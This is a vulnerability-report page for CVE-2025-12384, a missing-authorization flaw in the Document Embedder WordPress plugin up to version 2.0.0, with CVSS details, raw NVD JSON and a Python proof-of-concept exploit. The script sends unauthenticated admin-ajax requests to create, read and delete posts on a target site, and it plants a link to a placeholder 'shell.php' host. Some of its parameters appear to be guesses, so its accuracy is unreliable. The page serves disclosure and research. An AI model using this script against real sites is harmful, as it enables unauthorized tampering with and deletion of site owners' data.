Security Vulnerability Report
中文
CVE-2025-12384 CVSS 8.6 HIGH

CVE-2025-12384

Published: 2025-11-05 07:15:33
Last Modified: 2026-04-15 00:35:42

Description

The Document Embedder – Embed PDFs, Word, Excel, and Other Files plugin for WordPress is vulnerable to unauthorized access/modification/loss of data in all versions up to, and including, 2.0.0. This is due to the plugin not properly verifying that a user is authorized to perform an action in the "bplde_save_document_library", "bplde_get_all", "bplde_get_single", and "bplde_delete_document_library" functions. This makes it possible for unauthenticated attackers to create, read, update, and delete arbitrary document_library posts.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Document Embedder WordPress插件 <= 2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12384 PoC - WordPress Document Embedder Unauthenticated Access # Target: WordPress site with Document Embedder plugin <= 2.0.0 import requests import sys TARGET_URL = "http://target-wordpress-site.com" AJAX_URL = f"{TARGET_URL}/wp-admin/admin-ajax.php" def create_document_library(): """Create arbitrary document_library post without authentication""" data = { 'action': 'bplde_save_document_library', 'post_id': '0', 'post_title': 'Malicious Document', 'post_content': 'Injected malicious content', 'bplde_document_url': 'http://malicious-site.com/shell.php', 'bplde_document_type': 'pdf' } response = requests.post(AJAX_URL, data=data) print(f"Create Response: {response.status_code}") return response.text def read_all_documents(): """Read all document_library posts without authentication""" data = { 'action': 'bplde_get_all', 'post_type': 'document_library' } response = requests.post(AJAX_URL, data=data) print(f"Read All Response: {response.status_code}") return response.text def read_single_document(post_id): """Read single document_library post without authentication""" data = { 'action': 'bplde_get_single', 'post_id': str(post_id) } response = requests.post(AJAX_URL, data=data) print(f"Read Single Response: {response.status_code}") return response.text def delete_document_library(post_id): """Delete arbitrary document_library post without authentication""" data = { 'action': 'bplde_delete_document_library', 'post_id': str(post_id), 'delete_nonce': '' } response = requests.post(AJAX_URL, data=data) print(f"Delete Response: {response.status_code}") return response.text if __name__ == "__main__": print("CVE-2025-12384 - Document Embedder Unauthenticated Access") # Step 1: Create malicious document create_document_library() # Step 2: Read all documents (information disclosure) read_all_documents() # Step 3: Read specific document read_single_document(1) # Step 4: Delete document (data loss) delete_document_library(1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12384", "sourceIdentifier": "[email protected]", "published": "2025-11-05T07:15:32.570", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Document Embedder – Embed PDFs, Word, Excel, and Other Files plugin for WordPress is vulnerable to unauthorized access/modification/loss of data in all versions up to, and including, 2.0.0. This is due to the plugin not properly verifying that a user is authorized to perform an action in the \"bplde_save_document_library\", \"bplde_get_all\", \"bplde_get_single\", and \"bplde_delete_document_library\" functions. This makes it possible for unauthenticated attackers to create, read, update, and delete arbitrary document_library posts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?old=3359820&old_path=document-emberdder%2Ftrunk%2Fdocument-library-block.php&new=&new_path=document-emberdder%2Ftrunk%2Fdocument-library-block.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old=3359820&old_path=document-emberdder%2Ftrunk%2Fincludes%2FDocumentLibrary%2FInit-DocumentLibrary.php&new=&new_path=document-emberdder%2Ftrunk%2Fincludes%2FDocumentLibrary%2FInit-DocumentLibrary.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eb7e4e96-a4ff-4c6c-91de-c0e5ba78f0da?source=cve", "source": "[email protected]"}]}}